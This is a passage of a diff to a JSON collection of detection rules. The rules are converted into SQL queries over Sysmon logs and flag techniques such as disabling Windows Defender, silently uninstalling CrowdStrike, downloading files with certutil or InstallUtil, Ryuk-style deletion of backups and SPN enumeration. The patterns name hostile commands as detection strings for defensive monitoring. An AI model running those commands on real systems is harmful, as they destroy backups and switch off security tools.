AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (Image LIKE 
'%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Suspicious Execution of InstallUtil To Download", + "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." 
- ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" - ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" - }, - { - "title": "Remote Access Tool - ScreenConnect Execution", - "id": "57bff678-25d1-4d6c-8211-8ca106d12053", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "frack113", - "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of the tool" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" + "filename": "proc_creation_win_lolbin_installutil_download.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", - "author": "frack113", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", + "status": "experimental", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. 
This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "title": "Local Accounts Discovery", + "id": "502b42de-4306-40b4-9596-6f590c81f073", "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "description": "Local accounts, System Owner/User discovery using operating systems utilities", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - 
"attack.t1218.010", - "attack.t1218.011", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.discovery", + "attack.t1033", + "attack.t1087.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or user enumerates local users for legitimate reason" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% /c%' ESCAPE '\\' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\Users\\\\%' ESCAPE '\\') AND NOT (CommandLine LIKE '% rmdir %' ESCAPE '\\')) OR (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%user%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/domain%' ESCAPE '\\' OR CommandLine LIKE '%/add%' ESCAPE '\\' OR CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/active%' ESCAPE '\\' OR CommandLine LIKE '%/expires%' ESCAPE '\\' OR CommandLine LIKE '%/passwordreq%' ESCAPE '\\' OR CommandLine LIKE '%/scriptpath%' ESCAPE '\\' OR CommandLine LIKE '%/times%' ESCAPE '\\' OR CommandLine LIKE '%/workstations%' ESCAPE '\\'))) OR (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%useraccount%' ESCAPE '\\' AND CommandLine LIKE '%get%' ESCAPE '\\') OR (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' AND CommandLine LIKE '% /l%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_susp_local_system_owner_account_discovery.yml" }, { - "title": "Monitoring For Persistence Via BITS", - "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", - "status": "test", - "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", - "author": "Sreeman", + "title": "Sideloading Link.EXE", + "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "status": "experimental", + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". 
They can be abused to sideload any binary with the same name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1197" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", - "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by disabling their respective 
scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "Application Whitelisting Bypass via Dnx.exe", - "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Execute C# code located in the 
consoleapp folder", - "author": "Beyu Denis, oscd.community", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1027.004" + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of dnx.exe by legitimate user" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnx.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dnx.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "Suspicious Extrac32 Execution", - "id": "aa8e035d-7be4-48d3-a944-102aec04400d", - "status": "experimental", - "description": "Download or Copy file with Extrac32", - "author": "frack113", + "title": "Potential SPN Enumeration Via Setspn.EXE", + "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", + "status": "test", + "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", + "author": "Markus Neis, keepwatch", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Administration activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR Image LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_extrac32.yml" + "filename": "proc_creation_win_setspn_spn_enumeration.yml" }, { - "title": "Remote Access Tool - NetSupport Execution", - "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "title": "Potential Discovery Activity Via Dnscmd.EXE", + "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. 
DNS zones used to host the DNS records for a particular domain.", + "author": "@gott_cyber", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.discovery", + "attack.execution", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate use" + "Legitimate administration use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport.yml" + "filename": "proc_creation_win_dnscmd_discovery.yml" }, { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", "status": "experimental", - "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. 
It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1036.002" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "title": "Suspicious Csi.exe Usage", + "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", "status": "experimental", - "description": "Detects the execution of a renamed office binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. 
It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1072", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csi.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_csi_execution.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth 
(Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "Local Groups Reconnaissance Via Wmic.EXE", - "id": 
"164eda96-11b2-430b-85ff-6a265c15bf32", - "status": "experimental", - "description": "Detects the execution of \"wmic\" with the \"group\" flag.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "author": "frack113", + "title": "Scheduled Task Creation", + "id": "92626ddd-662c-49e3-ac59-f6535f12d189", + "status": "test", + "description": "Detects the creation of scheduled tasks in user session", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.005", + 